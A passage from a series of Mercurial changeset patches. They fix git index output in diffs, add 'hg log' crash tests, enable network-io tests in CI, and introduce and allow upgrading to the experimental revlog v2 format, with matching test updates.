or path in repo.store: + if not path or path in repo.store: break else: slowpath = False diff --git a/mercurial/patch.py b/mercurial/patch.py --- a/mercurial/patch.py +++ b/mercurial/patch.py @@ -20,6 +20,7 @@ from .i18n import _ from .node import ( hex, + nullhex, short, ) from .pycompat import open @@ -3099,12 +3100,12 @@ ctx1, fctx1, path1, flag1, content1, date1 = data1 ctx2, fctx2, path2, flag2, content2, date2 = data2 + index1 = _gitindex(content1) if path1 in ctx1 else nullhex + index2 = _gitindex(content2) if path2 in ctx2 else nullhex if binary and opts.git and not opts.nobinary: text = mdiff.b85diff(content1, content2) if text: - header.append( - b'index %s..%s' % (_gitindex(content1), _gitindex(content2)) - ) + header.append(b'index %s..%s' % (index1, index2)) hunks = ((None, [text]),) else: if opts.git and opts.index > 0: @@ -3114,8 +3115,8 @@ header.append( b'index %s..%s %s' % ( - _gitindex(content1)[0 : opts.index], - _gitindex(content2)[0 : opts.index], + index1[0 : opts.index], + index2[0 : opts.index], _gitmode[flag], ) ) diff --git a/mercurial/pycompat.py b/mercurial/pycompat.py --- a/mercurial/pycompat.py +++ b/mercurial/pycompat.py @@ -510,7 +510,7 @@ # This wrapper file are always open in byte mode. def unnamedtempfile(mode=None, *args, **kwargs): if mode is None: - mode = b'w+b' + mode = 'w+b' else: mode = sysstr(mode) assert 'b' in mode diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -2185,7 +2185,7 @@ global _re2 try: # check if match works, see issue3964 - _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]')) + _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]')) except ImportError: _re2 = False diff --git a/tests/test-diff-unified.t b/tests/test-diff-unified.t --- a/tests/test-diff-unified.t +++ b/tests/test-diff-unified.t @@ -456,3 +456,26 @@ . $ cd .. 
+ +Make sure `hg diff --git` differentiate "file did not exists" and "file is empty" +for git blob oids + + $ hg init bloboids + $ cd bloboids + + $ touch a + $ hg ci -Am "empty a" + adding a + $ hg diff -c 0 --git --config experimental.extendedheader.index=full | grep index + index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 100644 + +Make sure `hg diff --git` differentiate "file was empty" and "file is removed" +for git blob oids + + $ rm a + $ hg ci -Am "removed a" + removing a + $ hg diff -c 1 --git --config experimental.extendedheader.index=full | grep index + index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 100644 + + $ cd .. diff --git a/tests/test-diff-upgrade.t b/tests/test-diff-upgrade.t --- a/tests/test-diff-upgrade.t +++ b/tests/test-diff-upgrade.t @@ -185,7 +185,7 @@ % git=auto: git diff for newbinary diff --git a/newbinary b/newbinary new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..f76dd238ade08917e6712764a16a22005a50573d + index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 Ic${MZ000310RR91 @@ -202,7 +202,7 @@ % git=auto: git diff for rmbinary diff --git a/rmbinary b/rmbinary deleted file mode 100644 - index f76dd238ade08917e6712764a16a22005a50573d..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 + index f76dd238ade08917e6712764a16a22005a50573d..0000000000000000000000000000000000000000 GIT binary patch literal 0 Hc$@<O00001 diff --git a/tests/test-diffstat.t b/tests/test-diffstat.t --- a/tests/test-diffstat.t +++ b/tests/test-diffstat.t @@ -111,7 +111,7 @@ diff --git c c new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..f76dd238ade08917e6712764a16a22005a50573d + index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 Ic${MZ000310RR91 diff --git a/tests/test-git-export.t b/tests/test-git-export.t --- 
a/tests/test-git-export.t +++ b/tests/test-git-export.t @@ -346,7 +346,7 @@ $ cat b.diff diff --git a/binfile.bin b/binfile.bin new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..37ba3d1c6f17137d9c5f5776fa040caf5fe73ff9 + index 0000000000000000000000000000000000000000..37ba3d1c6f17137d9c5f5776fa040caf5fe73ff9 GIT binary patch literal 593 zc$@)I0<QguP)<h;3K|Lk000e1NJLTq000mG000mO0ssI2kdbIM00009a7bBm000XU diff --git a/tests/test-log-linerange.t b/tests/test-log-linerange.t --- a/tests/test-log-linerange.t +++ b/tests/test-log-linerange.t @@ -1114,7 +1114,7 @@ diff --git a/dir/binary b/dir/binary new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..c2e1fbed209fe919b3f189a6a31950e9adf61e45 + index 0000000000000000000000000000000000000000..c2e1fbed209fe919b3f189a6a31950e9adf61e45 GIT binary patch literal 17 Wc$_QA$SmdpqC~Ew%)G>+N(KNlNClYy diff --git a/tests/test-log.t b/tests/test-log.t --- a/tests/test-log.t +++ b/tests/test-log.t @@ -102,6 +102,41 @@ summary: c +log empty path (or repo root) of slow path shouldn't crash (issue6478) + + $ hg log -ql1 '' inexistent + 4:7e4639b4691b + $ hg log -ql1 . inexistent + 4:7e4639b4691b + $ hg log -ql1 "`pwd`" inexistent + 4:7e4639b4691b + + $ hg log -ql1 '' e + 4:7e4639b4691b + $ hg log -ql1 . e + 4:7e4639b4691b + $ hg log -ql1 "`pwd`" e + 4:7e4639b4691b + +log -f empty path (or repo root) shouldn't crash + + $ hg log -qfl1 '' inexistent + abort: cannot follow file not in parent revision: "inexistent" + [255] + $ hg log -qfl1 . inexistent + abort: cannot follow file not in parent revision: "inexistent" + [255] + $ hg log -qfl1 "`pwd`" inexistent + abort: cannot follow file not in parent revision: "inexistent" + [255] + + $ hg log -qfl1 '' e + 4:7e4639b4691b + $ hg log -qfl1 . 
e + 4:7e4639b4691b + $ hg log -qfl1 "`pwd`" e + 4:7e4639b4691b + -X, with explicit path $ hg log a -X a diff --git a/tests/test-narrow-shallow.t b/tests/test-narrow-shallow.t --- a/tests/test-narrow-shallow.t +++ b/tests/test-narrow-shallow.t @@ -92,28 +92,8 @@ 1: Commit rev2 of f8, d1/f8, d2/f8 0...: Commit rev2 of f7, d1/f7, d2/f7 -XXX flaky output (see issue6150) -XXX -XXX The filectx implementation is buggy and return wrong data during status. -XXX Leading to more file being "merged". The right output is the one with just -XXX 10 files updated. - $ hg update 4 - merging d2/f1 (?) - merging d2/f2 (?) - merging d2/f3 (?) - merging d2/f4 (?) - merging d2/f5 (?) - merging d2/f6 (?) - merging d2/f7 (?) - 3 files updated, 7 files merged, 0 files removed, 0 files unresolved (?) - 4 files updated, 6 files merged, 0 files removed, 0 files unresolved (?) - 5 files updated, 5 files merged, 0 files removed, 0 files unresolved (?) - 6 files updated, 4 files merged, 0 files removed, 0 files unresolved (?) - 7 files updated, 3 files merged, 0 files removed, 0 files unresolved (?) - 8 files updated, 2 files merged, 0 files removed, 0 files unresolved (?) - 9 files updated, 1 files merged, 0 files removed, 0 files unresolved (?) - 10 files updated, 0 files merged, 0 files removed, 0 files unresolved (?) + 10 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cat d2/f7 d2/f8 d2/f7 rev3 d2/f8 rev2 # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614283031 -3600 # Thu Feb 25 20:57:11 2021 +0100 # Node ID b41f551c5dc7561e429d57962ad4085ae1438b9e # Parent 6f4a481f182af5005ded9f3eb232dd7c16fa1af3 ci: hook network-io tests into the pipeline This runs the "pip install" tests once for Python 2 and 3 each. 
Differential Revision: https://phab.mercurial-scm.org/D10075 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -8,6 +8,7 @@ PYTHON: python TEST_HGMODULEPOLICY: "allow" HG_CI_IMAGE_TAG: "latest" + TEST_HGTESTS_ALLOW_NETIO: "0" .runtests_template: &runtests stage: tests @@ -23,7 +24,7 @@ script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" - - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS + - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS .rust_template: &rust @@ -69,6 +70,7 @@ variables: RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py3: <<: *runtests @@ -76,6 +78,7 @@ RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py2-pure: <<: *runtests # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613175214 28800 # Fri Feb 12 16:13:34 2021 -0800 # Node ID 7ed7b13fc00a6478a448a30c0b5e7ec1df2c7f84 # Parent b41f551c5dc7561e429d57962ad4085ae1438b9e rebase: inline simple function for finding obsolete subset of commits `_filterobsoleterevs()` is just one line long. It was introduced in 2d294dada4f8 (rebase: small refactoring to allow better extensibility from extensions, 2016-01-14), for use by the "inhibit" extension. That extension was removed from the evolve repo in 87e87881059d (compat: drop the inhibit hacky extension, 2017-10-24). 
Differential Revision: https://phab.mercurial-scm.org/D10198 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -474,7 +474,7 @@ ) # Calculate self.obsoletenotrebased - obsrevs = _filterobsoleterevs(self.repo, self.state) + obsrevs = {r for r in self.state if self.repo[r].obsolete()} self._handleskippingobsolete(obsrevs, self.destmap) # Keep track of the active bookmarks in order to reset them later @@ -2184,11 +2184,6 @@ return ret -def _filterobsoleterevs(repo, revs): - """returns a set of the obsolete revisions in revs""" - return {r for r in revs if repo[r].obsolete()} - - def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap): """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination). # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611844137 -3600 # Thu Jan 28 15:28:57 2021 +0100 # Node ID 913485776542596c95995f6bd0495654eb76bff9 # Parent 7ed7b13fc00a6478a448a30c0b5e7ec1df2c7f84 revlog: introduce v2 format As documented in [1], this is still tentative and could be subject to change, but we need to lay down the foundations in order to work on the next abstraction layers. 
[1] https://www.mercurial-scm.org/wiki/RevlogV2Plan Differential Revision: https://phab.mercurial-scm.org/D9843 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -233,10 +233,61 @@ return self._offsets[i] -def parse_index2(data, inline): +def parse_index2(data, inline, revlogv2=False): if not inline: - return IndexObject(data), None - return InlinedIndexObject(data, inline), (0, data) + cls = IndexObject2 if revlogv2 else IndexObject + return cls(data), None + cls = InlinedIndexObject2 if revlogv2 else InlinedIndexObject + return cls(data, inline), (0, data) + + +class Index2Mixin(object): + # 6 bytes: offset + # 2 bytes: flags + # 4 bytes: compressed length + # 4 bytes: uncompressed length + # 4 bytes: base rev + # 4 bytes: link rev + # 4 bytes: parent 1 rev + # 4 bytes: parent 2 rev + # 32 bytes: nodeid + # 8 bytes: sidedata offset + # 4 bytes: sidedata compressed length + # 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) + index_format = b">Qiiiiii20s12xQi20x" + index_size = struct.calcsize(index_format) + assert index_size == 96, index_size + null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) + + +class IndexObject2(Index2Mixin, IndexObject): + pass + + +class InlinedIndexObject2(Index2Mixin, InlinedIndexObject): + def _inline_scan(self, lgt): + sidedata_length_pos = 72 + off = 0 + if lgt is not None: + self._offsets = [0] * lgt + count = 0 + while off <= len(self._data) - self.index_size: + start = off + self.big_int_size + (data_size,) = struct.unpack( + b'>i', + self._data[start : start + self.int_size], + ) + start = off + sidedata_length_pos + (side_data_size,) = struct.unpack( + b'>i', self._data[start : start + self.int_size] + ) + if lgt is not None: + self._offsets[count] = off + count += 1 + off += self.index_size + data_size + side_data_size + if off != len(self._data): + raise ValueError(b"corrupted data") + return count def 
parse_index_devel_nodemap(data, inline): diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -30,7 +30,7 @@ # Increment the sub-version when the revlog v2 format changes to lock out old # clients. -REVLOGV2_REQUIREMENT = b'exp-revlogv2.1' +REVLOGV2_REQUIREMENT = b'exp-revlogv2.2' # A repository with the sparserevlog feature will have delta chains that # can spread over a larger span. Sparse reading cuts these large spans into diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -83,6 +83,7 @@ storageutil, stringutil, ) +from .pure import parsers as pureparsers # blanked usage of all the name to prevent pyflakes constraints # We need these name available in the module for extensions. @@ -364,6 +365,25 @@ return p +indexformatv2 = struct.Struct(pureparsers.Index2Mixin.index_format) +indexformatv2_pack = indexformatv2.pack + + +class revlogv2io(object): + def __init__(self): + self.size = indexformatv2.size + + def parseindex(self, data, inline): + index, cache = parsers.parse_index2(data, inline, revlogv2=True) + return index, cache + + def packentry(self, entry, node, version, rev): + p = indexformatv2_pack(*entry) + if rev == 0: + p = versionformat_pack(version) + p[4:] + return p + + NodemapRevlogIO = None if util.safehasattr(parsers, 'parse_index_devel_nodemap'): @@ -650,6 +670,8 @@ self._io = revlogio() if self.version == REVLOGV0: self._io = revlogoldio() + elif fmt == REVLOGV2: + self._io = revlogv2io() elif devel_nodemap: self._io = NodemapRevlogIO() elif use_rust_index: @@ -2337,7 +2359,13 @@ p1r, p2r, node, + 0, + 0, ) + + if self.version & 0xFFFF != REVLOGV2: + e = e[:8] + self.index.append(e) entry = self._io.packentry(e, self.node, self.version, curr) diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ 
-15,7 +15,6 @@ REVLOGV0 = 0 REVLOGV1 = 1 # Dummy value until file format is finalized. -# Reminder: change the bounds check in revlog.__init__ when this is changed. REVLOGV2 = 0xDEAD # Shared across v1 and v2. FLAG_INLINE_DATA = 1 << 16 diff --git a/tests/test-parseindex2.py b/tests/test-parseindex2.py --- a/tests/test-parseindex2.py +++ b/tests/test-parseindex2.py @@ -117,8 +117,8 @@ ) -def parse_index2(data, inline): - index, chunkcache = parsers.parse_index2(data, inline) +def parse_index2(data, inline, revlogv2=False): + index, chunkcache = parsers.parse_index2(data, inline, revlogv2=revlogv2) return list(index), chunkcache diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -22,7 +22,7 @@ $ cd empty-repo $ cat .hg/requires dotencode - exp-revlogv2.1 + exp-revlogv2.2 fncache sparserevlog store diff --git a/tests/test-revlog.t b/tests/test-revlog.t --- a/tests/test-revlog.t +++ b/tests/test-revlog.t @@ -22,10 +22,10 @@ Unknown version is rejected >>> with open('.hg/store/00changelog.i', 'wb') as fh: - ... fh.write(b'\x00\x00\x00\x02') and None + ... fh.write(b'\x00\x00\xbe\xef') and None $ hg log - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (48879) in revlog 00changelog.i [50] $ cd .. # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611173646 -3600 # Wed Jan 20 21:14:06 2021 +0100 # Node ID fd55a9eb1507dfa787e8b4ef95b3bda9fe178e0b # Parent 913485776542596c95995f6bd0495654eb76bff9 revlogv2: allow upgrading to v2 Revlogv2 implies sidedata. Right now sidedata is not really used in production, and Revlogv2 will be used for the first production-ready version of sidedata support. 
Differential Revision: https://phab.mercurial-scm.org/D9844 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1299,6 +1299,12 @@ ) coreconfigitem( b'format', + b'exp-revlogv2.2', + default=False, + experimental=True, +) +coreconfigitem( + b'format', b'exp-use-copies-side-data-changeset', default=False, experimental=True, diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3447,9 +3447,13 @@ # experimental config: format.exp-use-side-data if ui.configbool(b'format', b'exp-use-side-data'): + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) # experimental config: format.exp-use-copies-side-data-changeset if ui.configbool(b'format', b'exp-use-copies-side-data-changeset'): + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) requirements.add(requirementsmod.COPIESSDC_REQUIREMENT) if ui.configbool(b'experimental', b'treemanifest'): @@ -3457,7 +3461,7 @@ revlogv2 = ui.config(b'experimental', b'revlogv2') if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': - requirements.remove(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. 
requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT) requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -328,7 +328,7 @@ class sidedata(requirementformatvariant): name = b'sidedata' - _requirement = requirements.SIDEDATA_REQUIREMENT + _requirement = requirements.REVLOGV2_REQUIREMENT default = False @@ -339,6 +339,11 @@ upgrademessage = _(b'Allows storage of extra data alongside a revision.') + @classmethod + def fromrepo(cls, repo): + assert cls._requirement is not None + return cls._requirement in repo.requirements + @registerformatvariant class persistentnodemap(requirementformatvariant): @@ -371,6 +376,15 @@ @registerformatvariant +class revlogv2(requirementformatvariant): + name = b'revlog-v2' + _requirement = requirements.REVLOGV2_REQUIREMENT + default = False + description = _(b'Version 2 of the revlog.') + upgrademessage = _(b'very experimental') + + +@registerformatvariant class removecldeltachain(formatvariant): name = b'plain-cl-delta' @@ -857,8 +871,6 @@ """ return { # Introduced in Mercurial 0.9.2. - requirements.REVLOGV1_REQUIREMENT, - # Introduced in Mercurial 0.9.2. 
requirements.STORE_REQUIREMENT, } @@ -881,9 +893,21 @@ } +def check_revlog_version(reqs): + """Check that the requirements contain at least one Revlog version""" + all_revlogs = { + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + } + if not all_revlogs.intersection(reqs): + msg = _(b'cannot upgrade repository; missing a revlog version') + raise error.Abort(msg) + + def check_source_requirements(repo): """Ensure that no existing requirements prevent the repository upgrade""" + check_revlog_version(repo.requirements) required = requiredsourcerequirements(repo) missingreqs = required - repo.requirements if missingreqs: @@ -915,6 +939,8 @@ requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -937,13 +963,14 @@ requirements.DOTENCODE_REQUIREMENT, requirements.FNCACHE_REQUIREMENT, requirements.GENERALDELTA_REQUIREMENT, - requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, # allowed in case of downgrade requirements.STORE_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -973,6 +1000,8 @@ requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -985,7 +1014,7 @@ def check_requirements_changes(repo, new_reqs): old_reqs = repo.requirements - + check_revlog_version(repo.requirements) support_removal = supportremovedrequirements(repo) no_remove_reqs = old_reqs - new_reqs 
- support_removal if no_remove_reqs: diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1469,6 +1469,7 @@ sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: * (glob) compression-level: default default default @@ -1477,7 +1478,8 @@ requirements preserved: * (glob) - added: exp-copies-sidedata-changeset, exp-sidedata-flag + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -1507,6 +1509,7 @@ sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: * (glob) compression-level: default default default @@ -1515,7 +1518,8 @@ requirements preserved: * (glob) - added: exp-copies-sidedata-changeset, exp-sidedata-flag + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -42,6 +42,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -56,6 +57,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -427,6 +429,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -453,6 +456,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes 
yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -481,6 +485,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -59,6 +59,7 @@ sidedata: no persistent-nodemap: yes copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -578,6 +579,7 @@ sidedata: no no no persistent-nodemap: yes no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -623,6 +625,7 @@ sidedata: no no no persistent-nodemap: no yes no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -59,6 +59,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -72,6 +73,7 @@ sidedata: no yes no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -91,6 +93,7 @@ sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -104,6 +107,7 @@ sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default 
default diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -21,7 +21,7 @@ > EOF $ hg -R no-revlogv1 debugupgraderepo - abort: cannot upgrade repository; requirement missing: revlogv1 + abort: cannot upgrade repository; missing a revlog version [255] Cannot upgrade shared repositories @@ -61,6 +61,7 @@ sidedata: no persistent-nodemap: no copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -74,6 +75,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -87,6 +89,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -100,6 +103,7 @@ [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] @@ -154,6 +158,12 @@ "repo": false }, { + 
"config": false, + "default": false, + "name": "revlog-v2", + "repo": false + }, + { "config": true, "default": true, "name": "plain-cl-delta", @@ -306,6 +316,7 @@ sidedata: no persistent-nodemap: no copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -319,6 +330,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -332,6 +344,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -345,6 +358,7 @@ [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] @@ -1288,6 +1302,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zstd zlib zlib compression-level: default default default @@ -1324,6 +1339,7 @@ sidedata: no no no 
persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -1363,6 +1379,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zstd zstd zlib compression-level: default default default @@ -1386,10 +1403,11 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag (zstd !) - added: exp-sidedata-flag, sparserevlog (no-zstd !) + preserved: dotencode, fncache, generaldelta, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag (zstd !) + added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !) processed revlogs: - all-filelogs @@ -1406,17 +1424,18 @@ sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) compression: zstd zstd zlib (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 @@ -1430,9 +1449,10 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - removed: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) 
